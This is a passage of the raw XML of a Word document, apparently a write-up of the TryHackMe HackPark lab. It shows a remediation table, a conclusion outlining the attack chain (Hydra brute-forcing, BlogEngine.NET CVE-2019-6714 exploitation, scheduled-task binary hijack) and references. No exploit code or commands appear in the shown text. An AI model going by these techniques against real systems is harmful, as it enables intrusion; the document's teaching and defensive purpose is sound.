                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Restrict uploadable file types, validate content server-side, and isolate upload directories from execution paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3800"/>
            <w:shd w:fill="EAF1F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Scheduled task executes a binary from a directory writable by a low-privileged account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5550"/>
            <w:shd w:fill="EAF1F8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Apply least-privilege file/folder ACLs; ensure services and scheduled tasks only reference paths writable solely by trusted, privileged accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3800"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Weak or reused admin password crackable via wordlist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5550"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Enforce strong password policy and, where possible, multi-factor authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">8. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The HackPark room provides an excellent, realistic demonstration of an end-to-end Windows compromise: from initial web reconnaissance, through credential brute-forcing and CMS exploitation, to privilege escalation via a classic insecure-scheduled-task binary hijack. Each stage mirrors real-world attacker tradecraft and — just as importantly — maps directly onto concrete, actionable defensive controls. Practicing this room (and similar CTF labs) builds practical intuition for both offensive testing and secure system design.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9. References and Further Learning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TryHackMe — HackPark room: https://tryhackme.com/room/hackpark</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CVE-2019-6714 — BlogEngine.NET Directory Traversal / RCE (Exploit-DB)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hydra documentation — https://github.com/vanhauser-thc/thc-hydra</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Metasploit Framework documentation — https://docs.metasploit.com</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WinPEAS / PEASS-ng — https://github.com/peass-ng/PEASS-ng</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OWASP Testing Guide — Authentication Testing chapter (for brute-force / lockout controls)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F4E79"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>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2026-09-28T22:54:55.100Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-28T22:54:55.114Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>